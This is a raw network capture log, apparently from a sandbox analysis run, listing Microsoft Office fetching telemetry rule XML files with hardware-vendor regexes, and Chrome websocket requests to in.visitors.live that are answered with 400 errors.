                                                        2024-11-28 12:35:36 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        49192.168.2.44986513.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:36 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:36 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:36 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 469
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                        ETag: "0x8DC582BBA701121"
                                                        x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123536Z-174f7845968kdththC1EWRzvxn0000000aq000000000a1tb
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:36 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        50192.168.2.44986613.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:36 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:36 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:36 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 415
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                        ETag: "0x8DC582BA41997E3"
                                                        x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123536Z-174f7845968xlwnmhC1EWR0sv80000000ya0000000003kfu
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:36 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.2.44986935.201.124.94435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:37 UTC554OUTGET /socket.io/?EIO=3&transport=websocket HTTP/1.1
                                                        Host: in.visitors.live
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: jGp9V4/7nsklKlz9mBYRlw==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2024-11-28 12:35:38 UTC218INHTTP/1.1 400 Bad Request
                                                        Content-Type: application/json
                                                        Date: Thu, 28 Nov 2024 12:35:37 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-11-28 12:35:38 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        52192.168.2.44987013.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:38 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:38 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:38 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 477
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                        ETag: "0x8DC582BB8CEAC16"
                                                        x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123538Z-174f7845968cpnpfhC1EWR3afc0000000y10000000006s2g
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:38 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        53192.168.2.44987113.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:38 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:38 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:38 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 464
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                        ETag: "0x8DC582B97FB6C3C"
                                                        x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123538Z-174f78459684bddphC1EWRbht40000000y70000000003kdh
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:38 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        54192.168.2.44987213.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:38 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:39 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:38 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 419
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                        ETag: "0x8DC582B9748630E"
                                                        x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123538Z-174f7845968pf68xhC1EWRr4h80000000yrg000000004563
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:39 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        55192.168.2.44987313.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:38 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:39 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:38 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 494
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                        ETag: "0x8DC582BB7010D66"
                                                        x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123538Z-174f7845968n2hr8hC1EWR9cag0000000y20000000006fr5
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:39 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        56192.168.2.44987713.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:40 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:40 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:40 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 472
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                        ETag: "0x8DC582B9DACDF62"
                                                        x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123540Z-174f7845968frfdmhC1EWRxxbw0000000yk0000000001xzy
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:40 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        57192.168.2.44987935.201.124.94435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:40 UTC554OUTGET /socket.io/?EIO=3&transport=websocket HTTP/1.1
                                                        Host: in.visitors.live
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: NW9g0+gqMiM1PThushcQjA==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2024-11-28 12:35:40 UTC218INHTTP/1.1 400 Bad Request
                                                        Content-Type: application/json
                                                        Date: Thu, 28 Nov 2024 12:35:40 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-11-28 12:35:40 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        58192.168.2.44987813.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:40 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:41 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:41 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 404
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                        ETag: "0x8DC582B9E8EE0F3"
                                                        x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123541Z-174f7845968jrjrxhC1EWRmmrs0000000yg0000000008ht7
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:41 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        59192.168.2.44988113.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:41 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:41 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:41 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 428
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                        ETag: "0x8DC582BAC4F34CA"
                                                        x-ms-request-id: 14e4a643-101e-007a-3c66-40047e000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123541Z-174f7845968swgbqhC1EWRmnb40000000yh00000000089cq
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:41 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        60192.168.2.44988013.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:41 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:41 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:41 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 468
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                        ETag: "0x8DC582B9C8E04C8"
                                                        x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123541Z-174f7845968cdxdrhC1EWRg0en0000000yf0000000002ctb
